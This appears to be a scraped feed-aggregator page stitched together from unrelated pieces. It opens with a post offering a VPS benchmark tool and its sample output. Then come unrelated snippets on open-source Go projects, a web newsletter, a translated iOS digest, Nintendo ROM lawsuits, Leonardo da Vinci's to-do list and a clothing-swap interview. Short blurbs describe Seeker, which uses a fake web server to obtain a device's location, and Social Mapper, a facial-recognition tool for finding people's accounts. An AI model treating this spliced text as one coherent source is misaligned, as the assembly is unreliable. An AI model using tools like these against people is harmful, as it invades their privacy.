I'm willing to open source vpsbench, and I also have binaries (about 1 MB in size) built for and tested on Linux and FreeBSD, both i386 and x64. Right now I'm planning to put the vpsbench binaries on a server for download, but if there is significant interest I'll happily provide the sources too.

Here is example output from a real benchmark done on a 2 vCore / 512 MB VPS in Bucharest (the command was "vpsb ntargets", with ntargets being a file listing servers to test for connectivity).

Let me know what you think and if you are interested.

Machine: amd64, Arch.: amd64, Model: Intel(R) Xeon(R) CPU     L5630  @ 2.13GHz
OS, version: linux 4.10.5, Mem.: 479 MB
CPU - Cores: 2, Family/Model/Stepping: 6/44/2
Cache: 32K/32K L1d/L1i, 256K L2, 12M L3
Std. Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat
          pse36 cflsh mmx fxsr sse sse2 ss htt pbe sse3 pclmulqdq dtes64 ds_cpl
          ssse3 cx16 xtpr pcid dca sse4_1 sse4_2 popcnt aes hypervisor
Ext. Flags: syscall nx pdpe1gb lm lahf_lm

--- proc/mem/performance test single core ---
64 rounds~ 1.00 GB ->  116.98 MB/s
--- proc/mem/performance test multi-core ---
4 times 64 rounds ~ 4.00 GB ->  312.24 MB/s
--- disk test ---
Sequential writing 216.60 MB/s
Random writing     37.11 MB/s
Sequential reading 904.19 MB/s
Random reading     711.21 MB/s
--- network test - target   100KB  1MB  10MB   -> 64 MB ---
http://speedtest.lon02.softlayer.com/downloads/test100.zip  OK,LON:
    6.0 Mb/s   14.2 Mb/s   43.9 Mb/s    -> 111.9 Mb/s
http://speedtest.mel01.softlayer.com/downloads/test100.zip  AU,MEL:
    747.0 Kb/s   1.7 Mb/s   5.3 Mb/s    -> 13.6 Mb/s
http://speedtest.che01.softlayer.com/downloads/test100.zip  IN,CHN:
    1.6 Mb/s   3.7 Mb/s   10.9 Mb/s    -> 28.5 Mb/s
http://speedtest.fra02.softlayer.com/downloads/test100.zip  DE,FRA:
    11.1 Mb/s   26.1 Mb/s   78.9 Mb/s    -> 189.7 Mb/s
http://speedtest.mil01.softlayer.com/downloads/test100.zip  IT,MIL:
    5.9 Mb/s   13.9 Mb/s   40.2 Mb/s    -> 106.1 Mb/s
http://speedtest.par01.softlayer.com/downloads/test100.zip  FR,PAR:
    7.0 Mb/s   16.5 Mb/s   47.7 Mb/s    -> 124.5 Mb/s
http://93.95.100.190/test100mb.bin  RUS,MOS:
    2.3 Mb/s   5.5 Mb/s   7.7 Mb/s    -> 6.0 Mb/s
http://speedtest.sao01.softlayer.com/downloads/test100.zip  BR,SAO:
    1.2 Mb/s   2.7 Mb/s   8.4 Mb/s    -> 22.0 Mb/s
http://speedtest.dal05.softlayer.com/downloads/test100.zip  US,DAL:
    1.8 Mb/s   4.4 Mb/s   13.5 Mb/s    -> 34.5 Mb/s
http://speedtest.sjc01.softlayer.com/downloads/test100.zip  US,SJC:
    1.5 Mb/s   3.4 Mb/s   11.0 Mb/s    -> 28.8 Mb/s
http://speedtest.wdc01.softlayer.com/downloads/test100.zip  US,WDC:
    2.3 Mb/s   5.2 Mb/s   16.8 Mb/s    -> 42.4 Mb/s
http://speedtest.tokyo.linode.com/100MB-tokyo.bin   JP,TOK:
    1.0 Mb/s   2.4 Mb/s   7.7 Mb/s    -> 18.8 Mb/s
http://lg-ro.vps2day.com/100MB.test RO,BUK:
    22.5 Mb/s   49.7 Mb/s   130.8 Mb/s    -> 273.6 Mb/s
http://speedtest.ftp.otenet.gr/files/test100Mb.db   GR,UNK:
    2.0 Mb/s   6.7 Mb/s   21.5 Mb/s    -> 61.3 Mb/s
http://speedtest.osl01.softlayer.com/downloads/test100.zip  NO,OSL:
    4.3 Mb/s   9.4 Mb/s   29.0 Mb/s    -> 75.9 Mb/s

          Amazon Releases Alexa SDK For Cars
Amazon has launched an open source release of the Alexa Automotive Core (AAC) SDK, or Auto SDK, enabling automakers to integrate Alexa voice control into a car’s infotainment system. According to VentureBeat, the software development kit is free for download on GitHub, bringing Alexa to in-car dashboards for many common hands-free, voice-control tasks — such as playing […]
          Find Geolocation with Seeker with High Accuracy – Kali Linux 2018

With the help of Seeker, an open source Python script, you can easily find the geolocation of any device with high accuracy, along with device information like resolution, OS name, browser, public IP, platform, etc. Seeker uses ngrok (for tunnelling) and creates a fake Apache web server (on SSL) which asks for location […]

The post Find Geolocation with Seeker with High Accuracy – Kali Linux 2018 appeared first on Yeah Hub.


          Using GopherJS with gRPC-Web
Introduction This article will talk about how to connect a GopherJS frontend to a Go backend. If you haven’t heard about GopherJS before, it’s an open source Go-to-JavaScript transpiler, allowing us to write Go code and run it in the browser. I recommend taking a look at the official GitHub repo and Dmitri Shuralyov’s DotGo presentation Go in the browser for a deeper introduction. Writing GopherJS apps is great fun and lets us avoid writing JavaScript and all the problems associated with it.
          Promoting the Quality and Collaboration of Your Open Source Project
So your open source project is on GitHub. It has tests, an awesome logo, probably a few stars, and maybe even a few other contributors. To spread awareness, it might be shared on the relevant subreddit, Twitter, Hacker News, etc. While exposure is one of the most effective ways to promote a project, there are various steps that can be taken to ensure that its growth is positive and that the community it revolves around thrives.
          Data Pipelines and Versioning with the Pachyderm Go Client
I know about Gophers, but what is a Pachyderm? Pachyderm is an open source framework, written in Go, for reproducible data processing. With Pachyderm, you can create language agnostic data pipelines where the data input and output of each stage of your pipeline are versioned controlled in Pachyderm’s File System (PFS). Think “git for data.” You can view diffs of your data and collaborate with teammates using Pachyderm commits and branches.
          Geographical data manipulation using go
The open source GIS world is dominated by C/C++, Java and Python code. Libraries like PROJ4, JTS, GEOS and GDAL are at the core of most open source geospatial projects. Through this article we will have a look at the ecosystem of geospatial-related packages. We will create a GIF generator of an animated Earth. In case you want to know more about the image generation package, I recommend reading two articles on the Go blog: The Go image package and the Thanksgiving 2011 doodle.
          Hydra: Run your own Identity and Access Management service in <5 Minutes
This article introduces Hydra, the open source microservice alternative to proprietary authorization solutions. It will take you less than five minutes to start up an OAuth2 provider and gain access to a rich feature set, including access control and identity management. Hydra was primarily written in response to our team's need for a scalable 12factor OAuth2 consumer / provider with enterprise-grade authorization and interoperability without a ton of dependencies or crazy features.
          Integrating Go in a Yocto-based project
From its website, Yocto, part of the Linux Foundation Collaborative Projects, is an open source collaboration project that provides templates, tools and methods to help you create custom Linux-based systems for embedded products regardless of the hardware architecture. Given Go’s wonderful support for cross compilation, the two are like a match made in heaven. While not a requirement, Yocto-based projects have a strong preference for building everything from source, including the toolchain.
          Introducing Congo
Congo - an upcoming Conference Management Tool While we absolutely love running GopherCon, one thing jumps out as the most troublesome aspect of managing a large conference: managing the data. There are nice commercial solutions, but they charge pretty high fees. There are some open source solutions, but they’re generally older and abandoned. There are some hybrid solutions that are free for smaller conferences and expensive for larger ones.
          Patchwork Toolkit - Lightweight Platform for the Network of Things
Patchwork is a toolkit for connecting various devices into a network of things or, in a more broad case - Internet of Things (IoT). A tl;dr picture describing the idea behind it is shown below. Considering you as a hacker/hobbyist, the Patchwork toolkit can be expressed as follows: you take your favourite electronics (bunch of sensors, LED strip, robot-toys, etc), connect them to a pocket-size Linux box, install Patchwork, and after some quick configuration you get RESTful APIs, MQTT data streams, directory of your devices and services, their discovery on the LAN with DNS-SD/Bonjour, and a damn-sexy, open source real-time dashboard based on Freeboard.
          Why InfluxDB is written in Go
InfluxDB is an open source time series database written in Go. One of the important distinctions between Influx and some other time series solutions is that it doesn’t require any other software to install and run. This is one of the many wins that Influx gets from choosing Go as its implementation language. While the first commit to InfluxDB was just over a year ago, our decision to use Go can be traced back to November 2012.
          Writing a Distributed Systems Library in Go
Writing a Distributed Systems Library in Go Introduction In early 2013, I needed to add distributed processing and storage to my open source behavioral analytics database. To my surprise, there were almost no libraries for distributing data. Tools like doozerd were great for building systems on top of but I didn’t want my database to depend on a third party server. As I began to read distributed systems research papers I began to understand why there were not many libraries available.
          Continuous Integration and Delivery with Ansible
If your team is struggling to enable continuous integration and continuous deployment (CI/CD), it may be time to consider implementing an IT automation engine. Read on here to learn about an open source automation engine that could help you enable CI/CD with zero downtime. Published by: Red Hat
          SkyDNS (Or The Long Road to Skynet)
SkyDNS and Skynet This article is in two sections. The first is the announcement of SkyDNS, a new tool to help manage service discovery and announcement. The second part of the article is a bit of a back story about why we needed this tool and how we got here. If you're the impatient type, you can read the announcement and description of SkyDNS and skip the rest. SkyDNS Today we're releasing SkyDNS as an open source project on GitHub.
          Software Developer - Varian Medical Systems - Winnipeg, MB
Java, JavaScript/TypeScript, Angular, Python. Specialization in Java or other open source Web Application stack....
From Varian Medical Systems - Fri, 03 Aug 2018 06:07:59 GMT - View all Winnipeg, MB jobs
          UX Developer Lead, Themes - Shopify - Montréal, QC
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          WDRL — Edition 238: Chrome 67 Client Hints, Safari ITP Debugger, the Cost of JavaScript in 2018, and the not so nice impact of Open Source Projects.

Hey,

welcome to another edition of my newsletter. Please note that for the next two weeks I'll be on vacation and not writing a list, but before that, I found quite a few very good articles and resources worth reading this week.

Eric Meyer published an article this week elaborating on the problems with the effort to make the web HTTPS-only: he reveals that developing countries suffer a lot from this development, as they often have bad internet connections and, due to the encryption, now experience more website errors than before. Ben Werdmüller jumped in and published his article "Stop building for San Francisco", in which he points out one of the biggest problems we have as developers: we use privileged hardware and infrastructure. We build experiences using the latest iPhones and MacBooks on gigabit or fast 4G connections, but never consider that most of the people we're building for use far less well-equipped devices and infrastructure. And while it's a great idea to make the web more secure, we should always keep in mind who this might impact and who will no longer be able to access your site.

News

Generic

  • If you have an Open Source project or are building a new one, you have to decide which license it should use. Now there’s a new option, the Just World License. It’s for developers that agree in general with the principles of open source software, but are uncomfortable with their software being used as part of efforts to destroy lives, our environment and our future.

Tooling

  • Prashant Palikhe wrote a long story about the art of debugging with Chrome’s Developer Tools, which I can highly recommend as it’s a very complete reference to getting to know the developer tools of a browser. If you use another browser, that’s not a big problem as most tools are quite similar.

Security

  • And another new observer has arrived: the ReportingObserver API lets you know when your site uses a deprecated API or runs into a browser intervention; it is available in Chrome 69 so far. You could easily use this to send such errors, previously only visible in the Console, to your backend or error-handling service.
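    A quick sketch of the idea (the '/reporting-endpoint' URL is a placeholder for your own collector; the observer API itself is as shipped in Chrome 69):

    const observer = new ReportingObserver((reports) => {
      // Forward buffered deprecation/intervention reports to your own collector.
      navigator.sendBeacon('/reporting-endpoint', JSON.stringify(reports));
    }, { types: ['deprecation', 'intervention'], buffered: true });

    observer.observe();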

Accessibility

JavaScript

  • Addy Osmani researched the cost of JavaScript in 2018 and wrote a summary article, sharing evidence that every byte of JavaScript is still the most expensive resource we can send to mobile phones because it can delay interactivity in large ways. This is increasingly becoming a problem with not so capable phones that are widely used outside the tech industry.

CSS

Work & Life

  • Paris Marx on why lifestyle entrepreneurs ignore communities at home and abroad, and why, in his view, digital nomads are not the future. He explains that location independence is only possible because of communication infrastructure built with public funds, and why it's not fair to abuse it.

Go beyond…

  • Jeremy Nagel makes us all think about the impact we have when we publish open source code: as developers we tend to see it as an amazing move, but we also make our source code available to the bad players of the world: to coal miners, to pollution-contributing companies, to those who use humans to get rich while mistreating them, to those who rip you off indirectly, to people who make money off your free, open source code and give you nothing back. It's not that you can't do anything about it, but to do so you have to be aware of these issues and apply a better license or add a dedicated statement to your code. Want an example? Philip Morris International's website uses jQuery and Bootstrap, and that is a company that contributes to people getting cancer. Do you want your software to be associated with that?

—Anselm


          What’s new in Julia: Version 1.0 is here
After nearly a decade in development, Julia, an open source, dynamic language geared to numerical computing, reached its Version 1.0 production release status on August 8, 2018. The previous version was the 0.6 beta. Julia, which vies with Python for sc...
          iOS digest #27: React Native (how much longer?), 10 years of the App Store, what's new in Swift 4.2

In this issue: an analysis of CI services, a bit of reverse engineering, making our lives easier with various tools, and admiring the Apple Design Awards.

News

Swift Evolution
Judging by the updated readme, Swift 5 should be expected in early next year.

CarPlay iOS 12.0 Beta 1 to Beta 2 API Differences
Many new methods for CarPlay were added in iOS 12 Beta 2.

The App Store turns 10
The App Store has turned 10. These 10 years have changed a lot in terms of business and content consumption on mobile devices.

10 years of the App Store: The design evolution of the earliest apps
And one more article on the anniversary: how apps have changed over these 10 years.

Apple Design Awards 2018
The winners of the Apple Design Awards 2018. It is interesting to watch how design trends change from year to year.

In 4 years, the Swift repository has already accumulated 18,000 pull requests.

initial checkin, nothing much to see here.
Although Swift was announced 4 years ago, it has actually already turned 8.

Articles

Swift for Android: Our Experience and Tools
Who needs React Native, or how Readdle decided to build an Android app in Swift. Judging by the sample app, it does not look much like pure Swift. Is it worth it? I think we will find out from the team's future articles.

Benchmark of Swift extensions vs methods: Swift 4.1
Oh my, oh my: having many extensions slows down compilation. But the difference only becomes significant if you have thousands of methods.

Interesting statistics on what gets the most attention at WWDC. It is nice that this year more time was devoted to macOS.

Enabling newly added opt-in features in Xcode 10
If you are already using Xcode 10, it makes sense to enable the new features.

Custom Intents with SiriKit on iOS 12
The first SiriKit tutorials have arrived. Don't forget that much of this is covered in the WWDC videos.

Siri Shortcuts (in Russian)
And if you want the topic in Russian, here you go (not a translation).

Any[Object]
The AnyObject type in Swift is not as simple as it seems. At the end of the article there is a set of rules that help prevent non-obvious bugs.

The iOS Testing Manifesto
It is already becoming a tradition: a detailed guide on testing.

Painless Core Data in Swift
A few more tips on working with Core Data.

Continuous Integration Services for iPhone Apps in 2018
An overview of CI services. There is an Editor's Choice at the end.

AvitoTech team playbook
Avito shares how their team and processes are organized, and also tells the company's history and values.

iOS Developer Skills Matrix
A Junior-Middle-Senior matrix. It is all relative, of course, and depends on the company, but it is still fun to look at.

State of React Native 2018

Or is React Native needed after all? Facebook is working on a new version of RN that will make it easier to work with native elements, and existing apps will be easy to adapt. Expect news closer to the end of the year.

React Native at Airbnb
A five-part series of articles from Airbnb about their two years of experience with React Native. In short: they played with it, and that is enough. The experience is interesting in any case.

The Case for React Native
Meanwhile, Ash explains how much he likes RN. Whether to use it or not is up to you.

Airbnb and React Native Expectations
And then he decided to comment on the Airbnb articles. Also an interesting take.

React Native: A retrospective from the mobile-engineering team at Udacity
Yet another company tried RN and dropped it. The article is a bit odd, but still.

What we learned about CI/CD analysing 75k builds
Interesting statistics on the use of CI in mobile projects.

The Story Behind Susan Kare's Iconic Design Work for Apple
The story of how the icons for the first Macintoshes were created.

iPad Navigation Bar and Toolbar Height Changes in iOS 12
They just went and changed the navigation bar and toolbar heights and didn't tell anyone. Well done, Apple.

How to Use Slack and Not Go Crazy
A few tips on working with Slack so that life gets a little easier.

A Year of Monument Valley 2
The Monument Valley team has published its year-in-review; the results of previous years are available there too. It is interesting to watch how much the Chinese market has grown.

Reverse Engineering Instruments' File Format
Why not reverse-engineer the file format of Instruments in Xcode?

Code

What's new in Swift 4.2
Xcode 10 with Swift 4.2 support will ship in the fall; in the meantime you can poke around in the beta and see which features await us.

Swift's new calling convention
The new calling convention in Swift 4.2 should improve performance by reducing retain/release calls. We are waiting for benchmarks.

Icon for File with UIKit
Getting images for different file types. This is a fairly popular approach on macOS; we also use it a lot in CleanMyMac.

Writing self-documenting Swift code
I am always in favor of using variables or functions instead of comments, which go stale, get lost, and so on. There is a good joke on this topic, too. John describes several more approaches to making code self-documenting.

Making Swift tests easier to debug
No digest is complete without articles from John. Test readability is no less important than the readability of the code itself, since tests are examples of how to use the code and are often more useful than any documentation.

Swift Diagnostics: #warning and #error
You may have already seen that #warning and #error were added in Swift 4.2. But how are they implemented under the hood?

Enumerating enum cases in Swift
You can finally get all the cases of an enum without hardcoding them every time.

Swift Tip: Quick Performance Timing
A small snippet for measuring how long an operation takes.

Exploring @dynamicMemberLookup
The long-awaited dynamism was added even ahead of time, in Swift 4.2. A refresher on what it is, plus a useful hack for not shooting yourself in the foot.

Finding Non-localized Strings
Just one launch flag will help you find non-localized strings in your app.

@autoclosure what, why and when
I have never used it and had already forgotten that Swift has it. Does anyone use it?

Tools & Libs

Xcode for iPad, why not.

MarzipanTool
Want to try running an iOS app on macOS? Then this repository is just for you.

xcprojectlint
There was a linter for Interface Builder; there should be a linter for project files too.

iOSLocalizationEditor
A rather handy app for editing localization files.

Extensible mobile app debugger
Facebook has released a platform for debugging mobile apps, with a desktop app and other goodies. Has anyone tried it yet?

Sift app
An app that shows the network requests made by all apps. It would never be allowed into the App Store, so you can only build it onto your own device.

Check if UIImage exists in assets in compile time
If you don't use SwiftGen, R.swift or another similar solution, or you still write Objective-C, this may be a useful find. The script checks that the images used are present in the project.

NonEmpty
A library that guarantees at compile time that a collection is non-empty 😱

Bartinter
If your app's content extends under the status bar, sooner or later it will blend in with the background. To avoid worrying about it, you can grab a library that detects the background brightness and changes the status bar color accordingly.

SwiftServerSide-Vapor
Seems like a pretty decent example app built with Swift 4.1 and Vapor 3. It is in Chinese, though, but if you want to implement registration, some kind of feed and so on with Vapor, it is worth a look.


← Previous issue: iOS digest #26


          Social Mapper: A free tool for automated discovery of targets’ social media accounts

Trustwave has released Social Mapper, an open source tool that automates the process of discovering individuals' social media accounts.

How Social Mapper works

The tool takes advantage of facial recognition technology and searches for targets' accounts on LinkedIn, Facebook, Twitter, Google+, Instagram, VKontakte, Weibo and Douban. It accepts input in several forms: an organisation's name, searching via LinkedIn; a CSV file with names and URLs to images online; or a folder full of images …

The post Social Mapper: A free tool for automated discovery of targets’ social media accounts appeared first on Help Net Security.


          Comment on Free tool checks for critical open source vulnerabilities by ToxicAtomicDog
This "free" tool requires an email address to send you the link and also requires you to install Java to run the script? Not gonna do it, wouldn't be prudent.
          "You wouldn't download a car!"      Cache   Translate Page   Web Page Cache   
What Does Nintendo's Shutdown Of ROM-Sharing Sites Mean For Video Game Preservation? [Nintendo Life] "The recent news that Nintendo is taking legal action against two sites which illegally distributed ROMs has been met with an overwhelmingly positive response, and rightly so. The individuals sharing these files online care little for the intellectual property rights of the developers who slave away to make the games we get hours of enjoyment out of, and instead leverage the growing interest in retro gaming purely to plaster their sites with garish advertisements for mail-order girlfriends and other dubious businesses. Nintendo – a company traditionally very protective of its IP – has struck a blow which will hopefully have long-term ramifications for the entire industry." • Nintendo Suing Pirate Websites For Millions [Kotaku]
"On July 19, Nintendo filed suit in an Arizona Federal Court against the operator of two popular retro gaming sites, which had been hosting ROMS of some of the company's most famous games. The suit alleges that the two sites, LoveROMS.com and LoveRETRO.co—both owned and operated by Jacob Mathias—are "built almost entirely on the brazen and mass-scale infringement of Nintendo's intellectual property rights." "In addition to Nintendo's video games", the suit says, "Defendants reproduce, distribute, and publicly perform a vast library of Nintendo's other copyrighted works on and through the LoveROMs and LoveRETRO websites, including the proprietary BIOS software for several of Nintendo's video game systems and thousands of Nintendo's copyrighted musical works and audio recordings.""
• Lawsuit threat shuts down ROM downloads on major emulation site [Ars Technica]
"In the wake of Nintendo's recent lawsuits against other ROM distribution sites, major ROM repository EmuParadise has announced it will preemptively cease providing downloadable versions of copyrighted classic games. While EmuParadise doesn't seem to have been hit with any lawsuits yet, site founder MasJ writes in an announcement post that "it's not worth it for us to risk potentially disastrous consequences. I cannot in good conscience risk the futures of our team members who have contributed to the site through the years. We run EmuParadise for the love of retro games and for you to be able to revisit those good times. Unfortunately, it's not possible right now to do so in a way that makes everyone happy and keeps us out of trouble." EmuParadise will continue to operate as a repository for legal downloads of classic console emulators, as well as a database of information on thousands of classic games. "But you won't be able to get your games from here for now," as MasJ writes."
• Emulation isn't a dirty word, and one man thinks it can save gaming's history [Polygon]
""According to the Film Foundation, over half the films made before 1950 are gone," Cifaldi said. "I don't mean that you can't buy these on DVD. I mean they're gone. They don't exist anymore." For films produced before 1920, Cifaldi said, that number jumps to 80 percent. "That terrified me. I wasn't particularly a film buff, but the idea of these works just disappearing forever and never being recoverable scared the crap out of me. So I started wondering is anyone doing this for games. Is anyone making sure that video games aren't doing the same stupid shit that film did to make their heritage disappear? "And yeah, there were people doing this. We didn't call them archivists. We didn't call them digital archeologists or anything. We called them software pirates." It's emulation's long association with piracy, Cifaldi said, that has given it a bad name. Nintendo in particular seems to have a particular aversion towards it, he noted, pointing to their official statement on the issue which has been available at their corporate website for the last 16 years."
• Nintendo vs. Emulation: The difficulty of archiving games [Nintendo Enthusiast]
"Creating and using ROMs/ISOs and emulators is not inherently illegal. The thing is, there's a very thin gray area between the border of legal and illegal in this case. For someone to play classic games completely legally without it being on the original hardware with the original software, they would need to be using an emulator that's running on custom code and doesn't use BIOS files obtained from an external source. As for the games, they would need to be backups created by the user, who would have to create them by dumping the data from their own original copies of said games. Thus, emulation becomes illegal as soon as file-sharing is involved, and the vast majority of folks using emulators is doing so thanks to file-sharing. This is why Nintendo has constantly been trying to take down emulation hubs as it considers them to be centers for piracy promotion."
• Yes, Downloading Nintendo ROMs Is Illegal (Even if You Own the Game) [Tom's Hardware]
"For the most part, emulators in and of themselves do not fall under any copyright infringement, depending on their purpose. And, as mentioned before, it's unlikely a firm will call copyright infringement on a game if no company own the rights to it, or if no one really cares about the game. But what about the games people and companies do care about? It turns out, you're welcome to emulate any game for backup, so long as it's not used for commercial use. Check out what the U.S. Copyright Office has to say about it:
"Under section 117, you or someone you authorize may make a copy of an original computer program if the new copy is being made for archival (i.e., backup) purposes only; you are the legal owner of the copy; and any copy made for archival purposes is either destroyed, or transferred with the original copy, once the original copy is sold, given away, or otherwise transferred."
But selling that backup copy is another story, according to the U.S. Copyright Office:
"If you lawfully own a computer program, you may sell or transfer that lawful copy together with a lawfully made backup copy of the software, but you may not sell the backup copy alone. ... In addition to being a violation of the exclusive right of distribution, such activity is also likely to be a violation of the terms of the license to the software. ... You should be wary of sites that offer to sell you a backup copy. And if you do buy an illegal backup copy, you will be engaging in copyright infringement if you load that illegal copy onto your computer ...""
• The retro gaming industry could be killing video game preservation [Eurogamer]
"The convoluted nature of the video game emulation sector means that emulators rarely stand still for long; like any other program they are iterated upon, improved, modified for different tasks and generally tinkered with endlessly, creating development forks which branch off in multiple directions. It transpired that the fork of Snes9x used in the Retron 5 could be directly attributed to De Matteis himself. "Snes9x Next/2010 was a speedhack-focused fork that I personally developed, open sourced and published on Github," he says. "I had to perform heavy alterations to this core to get it to run acceptably well on old hardware. It is likely they used the software for this exact reason; that the others were not up to par performance-wise and it offered a good balance between performance and compatibility. Needless to say, I was never consulted beforehand; software was simply taken and sold in spite of its license that expressly forbids this." In Hyperkin's defense, it's not like the company simply downloaded the code from the web and installed it on the Retron 5; like many firms of this type, it didn't develop the software in-house but instead purchased it from an external contractor. De Matteis knows who this individual is - and has informed Hyperkin that he is aware of their identity - but doesn't wish to name them here. Nonetheless, this contractor has profited off the hard work of the RetroArch team."

          Reddit: [Discussion] If you could choose one closed source software to be open source, what software do you choose?

You can divide your answer into 2 parts:

First is software you want to be open source, and the second is the software that will be most beneficial for the general public, in case they aren't the same.

submitted by /u/Gift_Me_Linux_Games
[link] [comments]
          LXer: Strawberry: Quality sound, open source music player
I recently received an email from Jonas Kvinge, who forked the Clementine open source music player. Jonas writes: …
          Getting started with Postfix, an open source mail transfer agent
Postfix is a great program that routes and delivers email to accounts that are external to the system. It is currently used by approximately 33% of internet mail servers. In this article, I'll explain … - Source: opensource.com
          Social Mapper – Correlate social media profiles with facial recognition

Trustwave developed Social Mapper, an open source tool that uses facial recognition to correlate social media profiles across different social networks. Security experts at Trustwave have released Social Mapper, a new open-source tool that allows finding a person of interest across social media platforms using facial recognition technology. The tool was developed to gather intelligence from […]

The post Social Mapper – Correlate social media profiles with facial recognition appeared first on Security Affairs.


          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Free tool checks for critical open source vulnerabilities
Every month details emerge of dozens of new security vulnerabilities, and open source software is not immune from these. In order to help companies stay up to date and ensure vulnerabilities are patched quickly, open source security specialist WhiteSource is launching a free tool that provides companies with immediate, real-time alerts on the 50 most critical vulnerabilities published in the open source community. The standalone CLI tool is free to use and available for anyone to download as a desktop application. Once downloaded, the Vulnerability Checker offers users the opportunity to import and scan any library and run a quick check…

          Leonardo da Vinci to do list - ca. 1490
https://www.aneddoticamagazine.com/wp-content/uploads/davincilist.jpg

NPR's Robert Krulwich had it directly translated. And while all of the list might not be immediately clear, remember that da Vinci never intended for it to be read by web surfers 500 years in the future.


[Calculate] the measurement of Milan and Suburbs


[Find] a book that treats of Milan and its churches, which is to be had at the stationer’s on the way to Cordusio


[Discover] the measurement of Corte Vecchio (the courtyard in the duke’s palace).


[Discover] the measurement of the castello (the duke’s palace itself)


Get the master of arithmetic to show you how to square a triangle.


Get Messer Fazio (a professor of medicine and law in Pavia) to show you about proportion.


Get the Brera Friar (at the Benedictine Monastery to Milan) to show you De Ponderibus (a medieval text on mechanics)


[Talk to] Giannino, the Bombardier, re. the means by which the tower of Ferrara is walled without loopholes (no one really knows what Da Vinci meant by this)


Ask Benedetto Potinari (A Florentine Merchant) by what means they go on ice in Flanders


Draw Milan


Ask Maestro Antonio how mortars are positioned on bastions by day or night.


[Examine] the Crossbow of Mastro Giannetto


Find a master of hydraulics and get him to tell you how to repair a lock, canal and mill in the Lombard manner


[Ask about] the measurement of the sun promised me by Maestro Giovanni Francese


Try to get Vitolone (the medieval author of a text on optics), which is in the Library at Pavia, which deals with the mathematic.


From Open Culture



Aneddotica Magazine - Collaborative Blog since 2012 https://www.aneddoticamagazine.com/leonardo-da-vinci-to-do-list-c-a-1490/
          Global Fashion Exchange: “If people are smiling, the world is going to shift”

INTERVIEW On average, we wear our clothes a total of seven times, and then many simply get thrown away: 2.5 billion pounds of clothing each year, to be precise. Scary, but easy to change, as one of the simplest and most sustainable ways to let garments live longer is to find them a new owner. And this is the mission of the Global Fashion Exchange (GFX): to promote sustainable consumption patterns, such as reusing and recycling, around the globe through inspiring forums, educational content and cultural events like clothing swaps. Since its inception in 2013, GFX has saved 22 tons of clothes from going to landfills. FashionUnited thought that was pretty impressive and spoke to GFX co-founder Patrick Duffy to find out more.

Patrick, could you talk a little bit about the beginning of the Global Fashion Exchange?

Sure. A long time ago, I worked in nightlife as a promoter, and also at production companies for big fashion brands. I honed my skills and then became a restaurateur. I kind of got all-around experience in entertaining. As that was happening, I became more and more familiar with sustainability. Then I went to Copenhagen Fashion Week as a journalist, writing for various publications. They had a sustainability area there, and back then I didn't know much about it. But then Rana Plaza happened, and it shifted my perspective on the fashion industry. Everything had to do with overconsumption. It made me sick, and I had what I call my Oprah aha-moment. I was thinking about how to reframe everything. Then I was invited back to Copenhagen, and there they had an initial clothing swap in 2013, and I thought 'this is something I can take all my skills into and turn into a message'. And this was at a time when sustainability was still the s-word that nobody wanted to say. Sustainability still needed a lot of support.

Was your idea well received?

[laughs] Not initially. When I told people in the industry about the idea, they said what people often say about a really good idea: 'You are so crazy.' That's what people said, but that was so not true. But then I realised the people I was talking to were from fashion brands whose main goal was to sell clothes. But we've reached capacity when it comes to clothing production; we're maxed out. I kept presenting my idea and I heard other comments, people saying 'This is incredible, but we don't know how to do it'. Suddenly, everyone was super excited and supportive and helped me keep pushing the idea. In my personal life, I gave everything away, all my material possessions, and even then New York City was so expensive to live in. I left it all and really focused on turning the idea into something that would make me really happy to work on.

Do you charge for the events?

The larger events are completely free, because we do not want to exclude anyone; sustainability is a non-exclusionary topic. We just had a massive outdoor event in New York City at The Brooklyn Mirage, a huge outdoor venue in East Williamsburg. They were fantastic: they promoted the event and supported it by giving us the venue for free. We had superstar DJs, many people helping with setting up, and 20 ethical and sustainable brands showcasing their wares. They got the space for free because they needed a chance to get their message out, and I felt it wouldn't have been right to charge them money to do so. In addition, we had a fashion show with 120 models of all different colours and sizes; some were wheelchair-bound. All worked for free so that the event could be free, so that there is no reason why anyone should not participate. Charging a 10- or 20-dollar ticket fee can be a deal breaker for some.

What about the smaller swaps?

The smaller events allow the organisers to cover their costs. And that’s something people always ask: ‘How do you make money?’ For the smaller swaps, we work with the ambassadors to offset their costs and determine how much of a ticket price we can set in each local community. After all, they are putting time in; they deserve to be paid.


Are people biased against clothes from people they don’t know?

No, not at the swaps because don’t forget, people come voluntarily. And the big swaps are well frequented. They become glamorous events and people get interested. Interest is the hook to bring them into the loop and to educate them on the topic and on goals like human rights and sustainability. And once they understand a bit more about it, then people will hopefully go beyond the swap.

Would you say the swaps have a mind-changing effect?

Yes, if not a life-changing definitely a mind-changing effect. For example at the recent event in New York with 1,600 people, I was standing at the entrance and talking to each person attending, asking them ‘Do you know what you’re here for?’ Many did know; many did not know; they had just come to swap clothes. So it is a touchpoint to communicate the startling facts - and then the aha-moment happens, the transformational moment. Once people understand the problem - the fashion industry being the most polluting industry and consumers contributing to that - they can’t erase that.

People may not change their lifestyle but they have received the information, and most of the time, people want to get involved. They become activists in their own way, they share through social media and proudly show their swapped items. That’s a positive development.

When targeting people, especially millennials, it is important to psychologically understand how their mind works. And I know what people want; they want the experience. And the experience they have reflects back on the topic and the message, which is sustainability. That’s why it is easier to communicate through a positive experience; if people are smiling, the world is going to shift.

Could you explain how GFX Local came about?

GFX Local came up as a solution to spread the word about what we’re doing and to promote more clothing swaps. We noticed after organising the larger swaps that they require a lot of funding and manpower. It was always my dream to take this education all over the world, but it wasn’t going as quickly as I wanted because it depended on sponsorship; money, basically. ‘Money is a silly reason for this not to spread,’ I thought, and GFX Local was born, inspired by Fashion Revolution. We developed a tool kit for those interested to download and apply. Then, we go through a kind of question and answer process to find out if someone is qualified and they sign up to become GFX ambassadors. Or, they can download the kit, do it in their hometown and start a clothing swap.

Are there any country-specific biases? In India for example, second hand is not big at all.

